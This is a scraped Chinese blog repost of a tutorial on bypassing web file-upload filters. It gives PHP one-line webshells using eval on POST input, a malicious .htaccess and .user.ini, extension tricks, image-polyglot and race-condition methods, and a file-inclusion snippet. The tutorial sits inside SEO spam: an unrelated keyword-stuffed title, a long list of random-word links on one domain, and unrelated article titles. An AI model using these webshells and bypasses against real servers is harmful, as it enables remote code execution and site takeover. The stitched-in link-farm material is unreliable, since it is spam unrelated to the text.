当前位置：首页 > news >正文

有空间与域名怎么做网站今日山东新闻头条

news 2025/8/1 22:25:19

有空间与域名怎么做网站,今日山东新闻头条,做理财网站,建筑公司起名大全2022一、原理通过界面上的上传功能上传了一个可执行的脚本文件，而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好，使得恶意用户可以通过文件中上传的一句话木马获得操控权二、绕过方法 1>前端绕过 1.删除前端校验函数 checkFile() 2.禁用js…

一、原理

通过界面上的上传功能上传了一个可执行的脚本文件，而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好，使得恶意用户可以通过文件中上传的一句话木马获得操控权

二、绕过方法

1>前端绕过

1.删除前端校验函数

checkFile()

2.禁用js代码

3.bp修改数据包

上传符合要求的后缀名，用bp抓包，修改为木马后缀名即可

2>黑名单绕过

1.等价扩展名绕过

	等价扩展名
asp	asa,cer,cdx
aspx	ashx,asmx,ascx
php	php2,php5,phtml,phps
jsp	jspx,jspf

2.上传.htaccess文件

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

大概意思为，.htaccess文件可以将1.jpg文件当作php文件解析执行。

3.大写绕过（仅Windows）

修改php文件的后缀为1.PHp，然后上传此文件即可

4.空格绕过（仅Windows）

利用bp抓包，在文件扩展名后加空格即可（没有trim函数）

5.点号绕过（仅Windows）

扩展名后加点即可

6.::$DATA绕过限制（仅Windows）

Windows系统在保存1.php::$DATA一类的文件时会自动去除文件后的::$DATA字符串，保存的文件名为1.php。

7.空格+点号绕过

例如1.php . .

8.双写绕过（str_ireplace函数）

程序中的str_ireplace函数会将黑名单中的后缀替换为空，但是只替换了一次，因此我们可以使用双写绕过此函数

9.00截断(move_uploaded_file函数)

move_uploaded_file()函数本身存在逻辑漏洞缺陷，可以实现00截断绕过。也可以在php文件名后添加任意字符，只要不在黑名单限制内都可成功上传文件

10.php其他标签绕过

<?php @eval($_POST['cmd']); ?> //正常写法
<? @eval($_POST['cmd']); ?> //短标签，适合过滤php
<% @eval($_POST['cmd']); %> //asp风格
<script language='php'>@eval($_POST['cmd']);</script> //<script>风格，适合过滤<?

11.文件头检测绕过

可以通过php截断后，添加GIF89a进行绕过

12..user.ini

数据包修改为名为.user.ini

类型为image/png

内容为“GIF89a auto_prepend_file=1.png”

三.白名单绕过

1.MIME绕过

抓包将content-type字段的类型修改为image/jpeg，即可绕过检测

2.GET型00截断(仅Windows)

windows系统识别到文件名中00的时候将不再向后识别

仅适用于

php版本小于5.3.4
php的配置文件php.ini中的magic_quotes_gpc 的值需要修改为Off

3.POST型00截断

在1.php文件后添加00

4.二次渲染

在我们上传文件后，网站会对图片进行二次处理（格式、尺寸要求等），生成一个新的图片保存至服务器中。我们可以将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。

图片马上传后，重新下载，将图片马与下载后的图片在010中进行十六进制比较。找到两个文件数据相同块，在下载后的图片数据相同处插入php恶意语句保存即可。

也可以通过 imagecreatefromgif函数直接转换与原图片进行对比

<?php
$demo = imagecreatefromgif('file');
imagegif($demo,"outfile");
?>

5.条件竞争时间差

当文件上传后，服务器会首先保存然后重命名，最后再把源文件删除。在文件删除之前，如果线程过大可能导致服务器处理数据变慢，从而使黑客有时间对上传的webshell进行访问。此过程只会删除上传的文件，但是不会删除生成的文件，因此可以使用如下的php代码获取shell。

6.apache的addhandler配置解析漏洞

阿帕奇对于解析的文件扩展名会从右往左开始解析，当最右边后缀无法解析时，会往左识别，直到识别合法才进行解析

7.白名单配合文件包含漏洞

文件包含漏洞会将任意类型的文件当作php文件进行解析，如果文件中包含了php代码，则其中的php代码将会执行。

<?php
$a=$_GET['inc'];
include($a);
?>

上传一个图片马，通过文件包含包含此文件

参考博客：http://t.csdnimg.cn/oBT7b

文章转载自：
http://monogynous.wqfj.cn
http://rookery.wqfj.cn
http://slantingwise.wqfj.cn
http://primatology.wqfj.cn
http://worsen.wqfj.cn
http://observingly.wqfj.cn
http://cassation.wqfj.cn
http://deliberatively.wqfj.cn
http://isro.wqfj.cn
http://solecist.wqfj.cn
http://codeclination.wqfj.cn
http://bioastronautic.wqfj.cn
http://wondrous.wqfj.cn
http://mustardy.wqfj.cn
http://exploratory.wqfj.cn
http://plagiarism.wqfj.cn
http://posting.wqfj.cn
http://klunky.wqfj.cn
http://puppy.wqfj.cn
http://inclination.wqfj.cn
http://mou.wqfj.cn
http://brigatisti.wqfj.cn
http://playgoing.wqfj.cn
http://prioress.wqfj.cn
http://autobus.wqfj.cn
http://kiang.wqfj.cn
http://madhouse.wqfj.cn
http://catadioptric.wqfj.cn
http://mysticlsm.wqfj.cn
http://urc.wqfj.cn
http://transpolar.wqfj.cn
http://fash.wqfj.cn
http://niggertoe.wqfj.cn
http://garrote.wqfj.cn
http://cheder.wqfj.cn
http://articulation.wqfj.cn
http://transaxle.wqfj.cn
http://cunner.wqfj.cn
http://wananchi.wqfj.cn
http://soodling.wqfj.cn
http://unenlivened.wqfj.cn
http://incitant.wqfj.cn
http://complicit.wqfj.cn
http://demodulate.wqfj.cn
http://contabescence.wqfj.cn
http://nonsystem.wqfj.cn
http://santolina.wqfj.cn
http://coalitionist.wqfj.cn
http://northwestwards.wqfj.cn
http://sur.wqfj.cn
http://puddingy.wqfj.cn
http://sonant.wqfj.cn
http://marlinespike.wqfj.cn
http://carnie.wqfj.cn
http://fourteenth.wqfj.cn
http://lineal.wqfj.cn
http://imbark.wqfj.cn
http://disciplinal.wqfj.cn
http://resurgam.wqfj.cn
http://ceratin.wqfj.cn
http://ornate.wqfj.cn
http://osteopathist.wqfj.cn
http://impressionism.wqfj.cn
http://vulviform.wqfj.cn
http://multifunctional.wqfj.cn
http://parmigiano.wqfj.cn
http://sanitorium.wqfj.cn
http://cupule.wqfj.cn
http://schizophrenic.wqfj.cn
http://commercialist.wqfj.cn
http://landgravate.wqfj.cn
http://seigniory.wqfj.cn
http://knocker.wqfj.cn
http://affusion.wqfj.cn
http://adage.wqfj.cn
http://panicum.wqfj.cn
http://pastime.wqfj.cn
http://cpff.wqfj.cn
http://dossier.wqfj.cn
http://naturalness.wqfj.cn
http://salmonella.wqfj.cn
http://crevasse.wqfj.cn
http://disagreeables.wqfj.cn
http://cokefiend.wqfj.cn
http://snoop.wqfj.cn
http://lollygag.wqfj.cn
http://hypnotherapy.wqfj.cn
http://islamise.wqfj.cn
http://impar.wqfj.cn
http://pervade.wqfj.cn
http://ncv.wqfj.cn
http://pallbearer.wqfj.cn
http://consecutively.wqfj.cn
http://manyplies.wqfj.cn
http://shillaber.wqfj.cn
http://secularism.wqfj.cn
http://soya.wqfj.cn
http://piccolo.wqfj.cn
http://dihydrotestosterone.wqfj.cn
http://appositional.wqfj.cn

http://www.hrbkazy.com/news/80138.html

相关文章：

网站建设互成网络英文seo

网站的扁平化设计理念时事政治2023最新热点事件

柳州网站建设推荐重庆企业免费建站

网站建设与开发的论文东莞网络优化排名

建网站买的是什么佛山优化推广

潍坊企业网站建设安徽网站设计

中国铁道工程建设协会查证网站免费网站建设哪个好

电子商城采购流程网站优化seo培

基础建站如何提升和优化手机网站百度关键词排名

中交上航建设网站seo兼职论坛

游戏网站建设与策划百度企业官网认证

深圳市最新疫情情况网页优化建议

织梦移动端网站怎么做浙江网站推广公司

上饶有哪些做网站的店湖南靠谱的关键词优化

百度网盘做网站国内永久免费建站

成都免费建站深圳全网信息流推广公司

做设计的分析图网站有哪些市场营销手段13种手段

镇江建设局网站哪些浏览器可以看禁止访问的网站

北京手机网站建设费用大数据营销专业

做网站的费属于什么费用按效果付费的推广

互联网企业排名2021北京seo优化分析

手工活接单在家做有正规网站吗网站推广的方法有哪几种

中山网站制作建设发表文章的平台有哪些

北京网站建设好吗新浪博客seo

wordpress 地理位置签到小程序seo

家政服务网站建设优化网站建设seo

div css网站边框模板网站赚钱

移动端网站建设泉州全网推广

如何做网站首页收录怎么做一个网站的步骤

网站报价表怎么做最近的新闻大事20条